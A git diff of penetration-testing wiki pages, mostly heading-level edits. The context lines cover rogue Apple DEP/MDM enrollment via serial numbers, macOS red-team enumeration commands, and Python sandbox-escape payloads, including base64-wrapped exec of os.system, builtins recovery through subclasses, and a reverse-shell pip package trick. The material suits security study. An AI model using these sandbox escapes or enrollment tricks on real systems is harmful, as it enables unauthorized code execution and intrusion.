* [https://www.youtube.com/watch?v=ku8jZe-MHUU](https://www.youtube.com/watch?v=ku8jZe-MHUU)
* [https://duo.com/labs/research/mdm-me-maybe](https://duo.com/labs/research/mdm-me-maybe)
diff --git a/macos/macos-security-and-privilege-escalation/macos-mdm/enrolling-devices-in-other-organisations.md b/macos/macos-security-and-privilege-escalation/macos-mdm/enrolling-devices-in-other-organisations.md
index 34a2ffcd..96478c4f 100644
--- a/macos/macos-security-and-privilege-escalation/macos-mdm/enrolling-devices-in-other-organisations.md
+++ b/macos/macos-security-and-privilege-escalation/macos-mdm/enrolling-devices-in-other-organisations.md
@@ -17,18 +17,16 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Enrolling Devices in Other Organisations
-
-## Intro
+# Intro
As [**previously commented**](./#what-is-mdm-mobile-device-management)**,** in order to try to enrol a device into an organization **only a Serial Number belonging to that Organization is needed**. Once the device is enrolled, several organizations will install sensitive data on the new device: certificates, applications, WiFi passwords, VPN configurations [and so on](https://developer.apple.com/enterprise/documentation/Configuration-Profile-Reference.pdf).\
Therefore, this could be a dangerous entrypoint for attackers if the enrolment process isn't correctly protected.
**The following research is taken from** [**https://duo.com/labs/research/mdm-me-maybe**](https://duo.com/labs/research/mdm-me-maybe)
-## Reversing the process
+# Reversing the process
-### Binaries Involved in DEP and MDM
+## Binaries Involved in DEP and MDM
Throughout our research, we explored the following:
@@ -40,7 +38,7 @@ When using either `mdmclient` or `profiles` to initiate a DEP check-in, the `CPF
`CPGetActivationRecord` retrieves the _Activation Record_ from cache, if available. These functions are defined in the private Configuration Profiles framework, located at `/System/Library/PrivateFrameworks/Configuration Profiles.framework`.
-### Reverse Engineering the Tesla Protocol and Absinthe Scheme
+## Reverse Engineering the Tesla Protocol and Absinthe Scheme
During the DEP check-in process, `cloudconfigurationd` requests an _Activation Record_ from _iprofiles.apple.com/macProfile_. The request payload is a JSON dictionary containing two key-value pairs:
@@ -68,7 +66,7 @@ rsi = @selector(sendFailureNoticeToRemote);
Since the **Absinthe** scheme is what appears to be used to authenticate requests to the DEP service, **reverse engineering** this scheme would allow us to make our own authenticated requests to the DEP API. This proved to be **time consuming**, though, mostly because of the number of steps involved in authenticating requests. Rather than fully reversing how this scheme works, we opted to explore other methods of inserting arbitrary serial numbers as part of the _Activation Record_ request.
-### MITMing DEP Requests
+## MITMing DEP Requests
We explored the feasibility of proxying network requests to _iprofiles.apple.com_ with [Charles Proxy](https://www.charlesproxy.com). Our goal was to inspect the payload sent to _iprofiles.apple.com/macProfile_, then insert an arbitrary serial number and replay the request. As previously mentioned, the payload submitted to that endpoint by `cloudconfigurationd` is in [JSON](https://www.json.org) format and contains two key-value pairs.
@@ -129,7 +127,7 @@ With SSL Proxying enabled for _iprofiles.apple.com_ and `cloudconfigurationd` co
However, since the payload included in the body of the HTTP POST request to _iprofiles.apple.com/macProfile_ is signed and encrypted with Absinthe, (`NACSign`), **it isn't possible to modify the plain text JSON payload to include an arbitrary serial number without also having the key to decrypt it**. Although it would be possible to obtain the key because it remains in memory, we instead moved on to exploring `cloudconfigurationd` with the [LLDB](https://lldb.llvm.org) debugger.
-### Instrumenting System Binaries That Interact With DEP
+## Instrumenting System Binaries That Interact With DEP
The final method we explored for automating the process of submitting arbitrary serial numbers to _iprofiles.apple.com/macProfile_ was to instrument native binaries that either directly or indirectly interact with the DEP API. This involved some initial exploration of the `mdmclient`, `profiles`, and `cloudconfigurationd` in [Hopper v4](https://www.hopperapp.com) and [Ida Pro](https://www.hex-rays.com/products/ida/), and some lengthy debugging sessions with `lldb`.
@@ -375,7 +373,7 @@ SupervisorHostCertificates = (
With just a few `lldb` commands we can successfully insert an arbitrary serial number and get a DEP profile that includes various organization-specific data, including the organization's MDM enrollment URL. As discussed, this enrollment URL could be used to enroll a rogue device now that we know its serial number. The other data could be used to social engineer a rogue enrollment. Once enrolled, the device could receive any number of certificates, profiles, applications, VPN configurations and so on.
-### Automating `cloudconfigurationd` Instrumentation With Python
+## Automating `cloudconfigurationd` Instrumentation With Python
Once we had the initial proof-of-concept demonstrating how to retrieve a valid DEP profile using just a serial number, we set out to automate this process to show how an attacker might abuse this weakness in authentication.
@@ -391,11 +389,11 @@ This made it relatively easy to script our proof-of-concept demonstrating how to
-### Impact
+## Impact
There are a number of scenarios in which Apple's Device Enrollment Program could be abused that would lead to exposing sensitive information about an organization. The two most obvious scenarios involve obtaining information about the organization that a device belongs to, which can be retrieved from the DEP profile. The second is using this information to perform a rogue DEP and MDM enrollment. Each of these are discussed further below.
-#### Information Disclosure
+### Information Disclosure
As mentioned previously, part of the DEP enrollment process involves requesting and receiving an _Activation Record_, (or DEP profile), from the DEP API. By providing a valid, DEP-registered system serial number, we're able to retrieve the following information, (either printed to `stdout` or written to the `ManagedClient` log, depending on macOS version).
@@ -432,7 +430,7 @@ SupervisorHostCertificates = (
Although some of this information might be publicly available for certain organizations, having a serial number of a device owned by the organization along with the information obtained from the DEP profile could be used against an organization's help desk or IT team to perform any number of social engineering attacks, such as requesting a password reset or help enrolling a device in the company's MDM server.
-#### Rogue DEP Enrollment
+### Rogue DEP Enrollment
The [Apple MDM protocol](https://developer.apple.com/enterprise/documentation/MDM-Protocol-Reference.pdf) supports - but does not require - user authentication prior to MDM enrollment via [HTTP Basic Authentication](https://en.wikipedia.org/wiki/Basic\_access\_authentication). **Without authentication, all that's required to enroll a device in an MDM server via DEP is a valid, DEP-registered serial number**. Thus, an attacker that obtains such a serial number, (either through [OSINT](https://en.wikipedia.org/wiki/Open-source\_intelligence), social engineering, or by brute-force), will be able to enroll a device of their own as if it were owned by the organization, as long as it's not currently enrolled in the MDM server. Essentially, if an attacker is able to win the race by initiating the DEP enrollment before the real device, they're able to assume the identity of that device.
diff --git a/macos/macos-security-and-privilege-escalation/macos-protocols.md b/macos/macos-security-and-privilege-escalation/macos-protocols.md
index 02762abd..27655acf 100644
--- a/macos/macos-security-and-privilege-escalation/macos-protocols.md
+++ b/macos/macos-security-and-privilege-escalation/macos-protocols.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# MacOS Protocols
-
-## Bonjour
+# Bonjour
**Bonjour** is an Apple-designed technology that enables computers and **devices located on the same network to learn about services offered** by other computers and devices. It is designed such that any Bonjour-aware device can be plugged into a TCP/IP network and it will **pick an IP address** and make other computers on that network **aware of the services it offers**. Bonjour is sometimes referred to as Rendezvous, **Zero Configuration**, or Zeroconf.\
Zero Configuration Networking, such as Bonjour provides:
@@ -94,7 +92,7 @@ If you feel like Bonjour might be more secured **disabled**, you can do so with:
sudo launchctl unload -w /System/Library/LaunchDaemons/com.apple.mDNSResponder.plist
```
-## References
+# References
* [**The Mac Hacker's Handbook**](https://www.amazon.com/-/es/Charlie-Miller-ebook-dp-B004U7MUMU/dp/B004U7MUMU/ref=mt\_other?\_encoding=UTF8\&me=\&qid=)
* [**https://taomm.org/vol1/analysis.html**](https://taomm.org/vol1/analysis.html)
diff --git a/macos/macos-security-and-privilege-escalation/macos-red-teaming.md b/macos/macos-security-and-privilege-escalation/macos-red-teaming.md
index 295c9b94..73f1d8ae 100644
--- a/macos/macos-security-and-privilege-escalation/macos-red-teaming.md
+++ b/macos/macos-security-and-privilege-escalation/macos-red-teaming.md
@@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# MacOS Red Teaming
-
-## Common management methods
+# Common management methods
* JAMF Pro: `jamf checkJSSConnection`
* Kandji
@@ -38,7 +36,7 @@ And also about **MacOS** "special" **network** **protocols**:
[macos-protocols.md](macos-protocols.md)
{% endcontent-ref %}
-## Active Directory
+# Active Directory
In some occasions you will find that the **MacOS computer is connected to an AD**. In this scenario you should try to **enumerate** the active directory as you are use to it. Find some **help** in the following pages:
@@ -66,13 +64,13 @@ Also there are some tools prepared for MacOS to automatically enumerate the AD a
* [**Bifrost**](https://github.com/its-a-feature/bifrost): Bifrost is an Objective-C project designed to interact with the Heimdal krb5 APIs on macOS. The goal of the project is to enable better security testing around Kerberos on macOS devices using native APIs without requiring any other framework or packages on the target.
* [**Orchard**](https://github.com/its-a-feature/Orchard): JavaScript for Automation (JXA) tool to do Active Directory enumeration.
-### Domain Information
+## Domain Information
```
echo show com.apple.opendirectoryd.ActiveDirectory | scutil
```
-### Users
+## Users
The three types of MacOS users are:
@@ -113,15 +111,15 @@ dsconfigad -show
More info in [https://its-a-feature.github.io/posts/2018/01/Active-Directory-Discovery-with-a-Mac/](https://its-a-feature.github.io/posts/2018/01/Active-Directory-Discovery-with-a-Mac/)
-## External Services
+# External Services
MacOS Red Teaming is different from a regular Windows Red Teaming as usually **MacOS is integrated with several external platforms directly**. A common configuration of MacOS is to access to the computer using **OneLogin synchronised credentials, and accessing several external services** (like github, aws...) via OneLogin:
.png>)
-###
+##
-## References
+# References
* [https://www.youtube.com/watch?v=IiMladUbL6E](https://www.youtube.com/watch?v=IiMladUbL6E)
* [https://medium.com/xm-cyber/introducing-machound-a-solution-to-macos-active-directory-based-attacks-2a425f0a22b6](https://medium.com/xm-cyber/introducing-machound-a-solution-to-macos-active-directory-based-attacks-2a425f0a22b6)
diff --git a/macos/macos-security-and-privilege-escalation/macos-serial-number.md b/macos/macos-security-and-privilege-escalation/macos-serial-number.md
index 54a3d2d6..2d187c07 100644
--- a/macos/macos-security-and-privilege-escalation/macos-serial-number.md
+++ b/macos/macos-security-and-privilege-escalation/macos-serial-number.md
@@ -17,13 +17,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# MacOS Serial Number
-
Apple devices manufactured after 2010 generally have **12-character alphanumeric** serial numbers, with the **first three digits representing the manufacturing location**, the following **two** indicating the **year** and **week** of manufacture, the next **three** digits providing a **unique** **identifier**, and the **last** **four** digits representing the **model number**.
Serial number example: **C02L13ECF8J2**
-### **3 - Manufacturing locations**
+## **3 - Manufacturing locations**
| Code | Factory |
| :--- | :--- |
@@ -48,7 +46,7 @@ Serial number example: **C02L13ECF8J2**
| C7 | Pentragon, Changhai, China |
| RM | Refurbished/remanufactured |
-### 1 - Year of manufacturing
+## 1 - Year of manufacturing
| Code | Release |
| :--- | :--- |
@@ -73,19 +71,19 @@ Serial number example: **C02L13ECF8J2**
| Y | 2019 \(1st half\) |
| Z | 2019 \(2nd half\) |
-### 1 - Week of manufacturing
+## 1 - Week of manufacturing
The fifth character represent the week in which the device was manufactured. There are 28 possible characters in this spot: **the digits 1-9 are used to represent the first through ninth weeks**, and the **characters C through Y**, **excluding** the vowels A, E, I, O, and U, and the letter S, represent the **tenth through twenty-seventh weeks**. For devices manufactured in the **second half of the year, add 26** to the number represented by the fifth character of the serial number. For example, a product with a serial number whose fourth and fifth digits are “JH” was manufactured in the 40th week of 2012.
-### 3 - Uniq Code
+## 3 - Uniq Code
The next three digits are an identifier code which **serves to differentiate each Apple device of the same model** which is manufactured in the same location and during the same week of the same year, ensuring that each device has a different serial number.
-### 4 - Serial number
+## 4 - Serial number
The last four digits of the serial number represent the **product’s model**.
-### Reference
+## Reference
{% embed url="https://beetstech.com/blog/decode-meaning-behind-apple-serial-number" %}
diff --git a/misc/basic-python/README.md b/misc/basic-python/README.md
index 3b55d0a1..d784c815 100644
--- a/misc/basic-python/README.md
+++ b/misc/basic-python/README.md
@@ -17,17 +17,15 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Basic Python
+# Python Basics
-## Python Basics
-
-### Usefull information
+## Usefull information
It is an interpreted language\
list(xrange()) == range() --> In python3 range is the xrange of python2 (it is not a list but a generator)\
The difference between a Tuple and a List is that the position of a value in a tuple gives it a meaning but the lists are just ordered values. Tuples have structures, lists have order
-### Main operations
+## Main operations
To raise a number you should do: 3**2 (it isn't 3^2)\
If you do 2/3 it returns 1 because you are dividing two ints. If you want decimals you should divide floats (2.0/3.0).\
@@ -99,7 +97,7 @@ for letter in "hola":
#something with letter in "hola"
```
-### Tuples
+## Tuples
t1 = (1,'2,'three')\
t2 = (5,6)\
@@ -110,7 +108,7 @@ d += (4,) --> Adding into a tuple\
CANT! --> t1\[1] == 'New value'\
list(t2) = \[5,6] --> From tuple to list
-### List (array)
+## List (array)
d = \[] empty\
a = \[1,2,3]\
@@ -119,7 +117,7 @@ a + b = \[1,2,3,4,5]\
b.append(6) = \[4,5,6]\
tuple(a) = (1,2,3) --> From list to tuple
-### Dictionary
+## Dictionary
d = {} empty\
monthNumbers={1:’Jan’, 2: ‘feb’,’feb’:2}—> monthNumbers ->{1:’Jan’, 2: ‘feb’,’feb’:2}\
@@ -133,7 +131,7 @@ monthNumbers.update(a) = {'9':9, 1:’Jan’, 2: ‘feb’,’feb’:2}\
mN = monthNumbers.copy() #Independent copy\
monthNumbers.get('key',0) #Check if key exists, Return value of monthNumbers\["key"] or 0 if it does not exists
-### Set
+## Set
In the sets there are not repetitions\
myset = set(\['a', 'b']) = {'a', 'b'}\
@@ -152,7 +150,7 @@ myset.intersection_update(myset2) #myset = Elements in both myset and myset2\
myset.difference_update(myset2) #myset = Elements in myset but not in myset2\
myset.symmetric_difference_update(myset2) #myset = Elements that are not in both
-### Classes
+## Classes
The method in \__It\_\_ will be the one used by sort in order to compare if an object of this class is bigger than other
@@ -184,7 +182,7 @@ class MITPerson(Person):
return self.idNum < other.idNum
```
-### map, zip, filter, lambda, sorted and one-liners
+## map, zip, filter, lambda, sorted and one-liners
**Map** is like: \[f(x) for x in iterable] --> map(tutple,\[a,b]) = \[(1,2,3),(4,5)]\
m = map(lambda x: x % 3 == 0, \[1, 2, 3, 4, 5, 6, 7, 8, 9]) --> \[False, False, True, False, False, True, False, False, True]
@@ -215,7 +213,7 @@ my_car = Car(); my_car.crash() = 'Boom!'
mult1 = \[x for x in \[1, 2, 3, 4, 5, 6, 7, 8, 9] if x%3 == 0 ]
-### Exceptions
+## Exceptions
```
def divide(x,y):
@@ -231,7 +229,7 @@ def divide(x,y):
print “executing finally clause in any case”
```
-### Assert()
+## Assert()
If the condition is false the string will by printed in the screen
@@ -241,7 +239,7 @@ def avg(grades, weights):
assert len(grades) == 'wrong number grades'
```
-### Generators, yield
+## Generators, yield
A generator, instead of returning something, it "yields" something. When you access it, it will "return" the first value generated, then, you can access it again and it will return the next value generated. So, all the values are not generated at the same time and a lot of memory could be saved using this instead of a list with all the values.
@@ -255,7 +253,7 @@ g = myGen(6) --> 6\
next(g) --> 7\
next(g) --> Error
-### Regular Expresions
+## Regular Expresions
import re\
re.search("\w","hola").group() = "h"\
@@ -302,7 +300,7 @@ print(list(**combinations**('123',2))) --> \[('1', '2'), ('1', '3'), ('2', '3')]
from itertools import **combinations_with_replacement** --> Generates all possible combinations from the char onwards(for example, the 3rd is mixed from the 3rd onwards but not with the 2nd o first)\
print(list(**combinations_with_replacement**('1133',2))) = \[('1', '1'), ('1', '1'), ('1', '3'), ('1', '3'), ('1', '1'), ('1', '3'), ('1', '3'), ('3', '3'), ('3', '3'), ('3', '3')]
-### Decorators
+## Decorators
Decorator that size the time that a function needs to be executed (from [here](https://towardsdatascience.com/decorating-functions-in-python-619cbbe82c74)):
diff --git a/misc/basic-python/bruteforce-hash-few-chars.md b/misc/basic-python/bruteforce-hash-few-chars.md
index 3af31058..e46bb30e 100644
--- a/misc/basic-python/bruteforce-hash-few-chars.md
+++ b/misc/basic-python/bruteforce-hash-few-chars.md
@@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Bruteforce hash \(few chars\)
-
```python
import hashlib
diff --git a/misc/basic-python/bypass-python-sandboxes/README.md b/misc/basic-python/bypass-python-sandboxes/README.md
index 5ded4837..722516a4 100644
--- a/misc/basic-python/bypass-python-sandboxes/README.md
+++ b/misc/basic-python/bypass-python-sandboxes/README.md
@@ -17,11 +17,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-# Bypass Python sandboxes
-
These are some tricks to bypass python sandbox protections and execute arbitrary commands.
-## Command Execution Libraries
+# Command Execution Libraries
The first thing you need to know is if you can directly execute code with some already imported library, or if you could import any of these libraries:
@@ -68,9 +66,9 @@ Python try to **load libraries from the current directory first** (the following
.png>)
-## Bypass pickle sandbox with default installed python packages
+# Bypass pickle sandbox with default installed python packages
-### Default packages
+## Default packages
You can find a **list of pre-installed** packages here: [https://docs.qubole.com/en/latest/user-guide/package-management/pkgmgmt-preinstalled-packages.html](https://docs.qubole.com/en/latest/user-guide/package-management/pkgmgmt-preinstalled-packages.html)\
Note that from a pickle you can make the python env **import arbitrary libraries** installed in the system.\
@@ -91,7 +89,7 @@ print(base64.b64encode(pickle.dumps(P(), protocol=0)))
For more information about how does pickle works check this: [https://checkoway.net/musings/pickle/](https://checkoway.net/musings/pickle/)
-### Pip package
+## Pip package
Trick shared by **@isHaacK**
@@ -110,7 +108,7 @@ You can download the package to create the reverse shell here. Please, note that
This package is called `Reverse`.However, it was specially crafted so when you exit the reverse shell the rest of the installation will fail, so you **won't leave any extra python package installed on the server** when you leave.
{% endhint %}
-## Eval-ing python code
+# Eval-ing python code
This is really interesting if some characters are forbidden because you can use the **hex/octal/B64** representation to **bypass** the restriction:
@@ -135,7 +133,7 @@ exec('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk='.decode("base64")) #Only python2
exec(__import__('base64').b64decode('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk='))
```
-## Builtins
+# Builtins
* [**Builtins functions of python2**](https://docs.python.org/2/library/functions.html)
* [**Builtins functions of python3**](https://docs.python.org/3/library/functions.html)
@@ -147,7 +145,7 @@ __builtins__.__import__("os").system("ls")
__builtins__.__dict__['__import__']("os").system("ls")
```
-### No Builtins
+## No Builtins
When you don't have `__builtins__` you are not going to be able to import anything nor even read or write files as **all the global functions** (like `open`, `import`, `print`...) **aren't loaded**.\
However, **by default python import a lot of modules in memory**. This modules may seem benign, but some of them are **also importing dangerous** functionalities inside of them that can be accessed to gain even **arbitrary code execution**.
@@ -177,11 +175,11 @@ import __builtin__
get_flag.__globals__['__builtins__']['__import__']("os").system("ls")
```
-#### Python3
+### Python3
```python
# Obtain builtins from a globally defined function
-## https://docs.python.org/3/library/functions.html
+# https://docs.python.org/3/library/functions.html
print.__self__
dir.__self__
globals.__self__
@@ -196,7 +194,7 @@ get_flag.__globals__['__builtins__']
[**Below there is a bigger function**](./#recursive-search-of-builtins-globals) to find tens/**hundreds** of **places** were you can find the **builtins**.
-#### Python2 and Python3
+### Python2 and Python3
```python
# Recover __builtins__ and make eveything easier
@@ -204,7 +202,7 @@ __builtins__= [x for x in (1).__class__.__base__.__subclasses__() if x.__name__
__builtins__["__import__"]('os').system('ls')
```
-### Builtins payloads
+## Builtins payloads
```python
# Possible payloads once you have found the builtins
@@ -214,7 +212,7 @@ __builtins__["__import__"]('os').system('ls')
# See them below
```
-## Globals and locals
+# Globals and locals
Checking the **`globals`** and **`locals`** is a good way to know what you can access.
@@ -237,18 +235,18 @@ class_obj.__init__.__globals__
# Obtaining globals from __init__ of loaded classes
[ x for x in ''.__class__.__base__.__subclasses__() if "__globals__" in dir(x.__init__) ]
[, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ]
-## Without the use of the dir() function
+# Without the use of the dir() function
[ x for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__)]
[,